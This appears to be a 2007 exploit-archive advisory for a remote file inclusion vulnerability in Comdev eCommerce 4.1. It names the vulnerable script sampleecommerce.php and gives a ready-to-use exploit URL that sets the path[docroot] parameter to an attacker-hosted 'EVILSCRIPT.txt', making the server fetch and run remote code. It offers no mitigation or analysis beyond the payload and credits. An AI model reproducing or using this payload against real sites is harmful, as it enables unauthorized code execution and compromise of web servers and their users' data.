Comdev eCommerce 4.1 RFI Vulnerability

2007-06-26
ID: 72012
CVE: None
Download vulnerable application: None
########################################################################
###########################################################
#  
# 
#
########################################################################
###########################################################
# Infomation:-
#
# Scripts:  Comdev eCommerce
# Download: http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://sha
re.comdevweb.com/download/ecommerce-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http
://EVILSCRIPT.txt?
#
########################################################################
###########################################################
#
# Discoverd By : [L.T.C]
#
########################################################################
###########################################################
1-4-2 (www01)